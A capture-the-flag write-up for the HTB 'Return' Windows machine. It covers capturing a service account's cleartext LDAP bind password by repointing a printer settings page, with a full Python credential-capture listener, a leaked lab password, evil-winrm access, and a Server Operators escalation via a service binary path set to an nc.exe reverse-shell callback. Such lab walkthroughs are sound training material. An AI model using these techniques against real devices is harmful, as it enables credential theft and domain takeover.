
HTB Windows Easy: Return

Return is an Easy-rated Windows machine on HTB.


Nmap

[Screenshot: nmap scan results]

Initial Foothold

Enumerating HTTP (Port 80)

Browsing to the web page and opening the Settings tab exposes the credentials the application uses to authenticate to its directory server: a server address, a port (389), a username (svc-printer) and a password field whose value is masked.

Since the UI never shows the password, we make the server hand it to us instead. Change the server address to our VPN IP, leave the port at 389 (LDAP), and start a nc listener on that port. When the application applies the new settings it attempts an LDAP bind against whatever server is configured, and an LDAP simple bind sends the password as a cleartext string, so our listener receives it.

When we press Update, the bind request arrives at the nc listener and the password is visible in plaintext: svc-printer:1edFg43012!!.
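The reason this works is that an LDAP simple bind (RFC 4511) carries the password as a plain BER octet string, so anything listening on the configured port sees it. nc shows the raw bytes; the listener below, added here as an example and not code from the original post, does the same capture but decodes the BER so the bind name and password are printed cleanly, and replies with a "success" result so the client does not hang on the update. The bind request used in the test is constructed from the username shown on the page; the exact bind DN the device sends is not shown in the post, and binding to port 389 needs root (pass another port and change the port field in the Settings tab to match).

```python
import socket

# BER/LDAP tags used by a simple bind (RFC 4511, X.690)
TAG_INTEGER, TAG_OCTET_STRING, TAG_ENUMERATED, TAG_SEQUENCE = 0x02, 0x04, 0x0A, 0x30
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0] constructed
TAG_BIND_RESPONSE = 0x61  # [APPLICATION 1] constructed
TAG_SIMPLE_AUTH = 0x80    # [CONTEXT 0] primitive: the cleartext password


def _int(n: int) -> bytes:
    # minimal big-endian two's complement encoding for n >= 0
    return n.to_bytes((n.bit_length() + 8) // 8, "big")


def _tlv(tag: int, value: bytes) -> bytes:
    # BER tag-length-value with short or long-form length
    n = len(value)
    if n < 0x80:
        length = bytes([n])
    else:
        body = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(body)]) + body
    return bytes([tag]) + length + value


def _read_tlv(buf: bytes, pos: int):
    """Decode one BER element at pos; return (tag, value, position after it)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4 or pos + nbytes > len(buf):
            raise ValueError("unsupported or truncated BER length")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER value")
    return tag, value, pos + length


def build_simple_bind(message_id: int, name: str, password: str) -> bytes:
    """Encode LDAPMessage{BindRequest, simple auth}, i.e. what the client sends.
    Used here only to construct a sample request for offline testing."""
    bind = (_tlv(TAG_INTEGER, _int(3))                    # version 3
            + _tlv(TAG_OCTET_STRING, name.encode())      # bind DN / user name
            + _tlv(TAG_SIMPLE_AUTH, password.encode()))  # password, unencrypted
    return _tlv(TAG_SEQUENCE, _tlv(TAG_INTEGER, _int(message_id)) + _tlv(TAG_BIND_REQUEST, bind))


def build_bind_response(message_id: int) -> bytes:
    """LDAPResult 'success': resultCode 0, empty matchedDN and diagnosticMessage."""
    result = _tlv(TAG_ENUMERATED, b"\x00") + _tlv(TAG_OCTET_STRING, b"") + _tlv(TAG_OCTET_STRING, b"")
    return _tlv(TAG_SEQUENCE, _tlv(TAG_INTEGER, _int(message_id)) + _tlv(TAG_BIND_RESPONSE, result))


def parse_bind_request(data: bytes) -> dict:
    """Pull message id, version, bind name and cleartext password out of a bind."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, mid, pos = _read_tlv(msg, 0)
    if tag != TAG_INTEGER:
        raise ValueError("missing messageID")
    tag, op, _ = _read_tlv(msg, pos)
    if tag != TAG_BIND_REQUEST:
        raise ValueError(f"protocolOp tag 0x{tag:02x} is not a BindRequest")
    _, version, pos = _read_tlv(op, 0)
    _, name, pos = _read_tlv(op, pos)
    tag, auth, _ = _read_tlv(op, pos)
    if tag != TAG_SIMPLE_AUTH:
        raise ValueError("not a simple bind (SASL); no cleartext password to read")
    return {
        "message_id": int.from_bytes(mid, "big", signed=True),
        "version": int.from_bytes(version, "big", signed=True),
        "name": name.decode("utf-8", "replace"),
        "password": auth.decode("utf-8", "replace"),
    }


def capture_once(port: int = 389, host: str = "0.0.0.0") -> dict:
    """Wait for one connection, parse its bind, answer 'success', return the creds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            creds = parse_bind_request(conn.recv(4096))  # a bind fits in one segment
            conn.sendall(build_bind_response(creds["message_id"]))
    creds["peer"] = peer[0]
    return creds


if __name__ == "__main__":
    import sys
    c = capture_once(int(sys.argv[1]) if len(sys.argv) > 1 else 389)
    print(f"[{c['peer']}] {c['name']}:{c['password']}")
```

The parser refuses anything that is not a simple bind: a client that negotiates SASL, or that talks LDAPS on 636 or issues StartTLS, does not leak the password this way, which is also the fix on the defensive side (require LDAPS or signing on the device, and treat the LDAP service account as low-privilege).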

Shell

To get a shell we can simply authenticate over WinRM with the captured credentials using evil-winrm.

Priv Esc

Checking the account's group memberships shows that svc-printer is a member of Server Operators. Members of that built-in group can stop, start and reconfigure services on the domain controller, which is enough to run an arbitrary command in a service's security context, so we can escalate our privileges.

Follow the guide linked in Sources to escalate: the technique is to point an existing service's binary path at a reverse-shell command (for example an uploaded nc.exe calling back to a listener on our machine) and then restart that service so the command runs with the service's privileges.

Once the service restarts, the nc listener should receive the callback and turn into an elevated shell.

User.txt

[Screenshot: user.txt]

Root.txt

[Screenshot: root.txt]

You have PWNED!!!


Sources

This post is licensed under CC BY 4.0 by the author.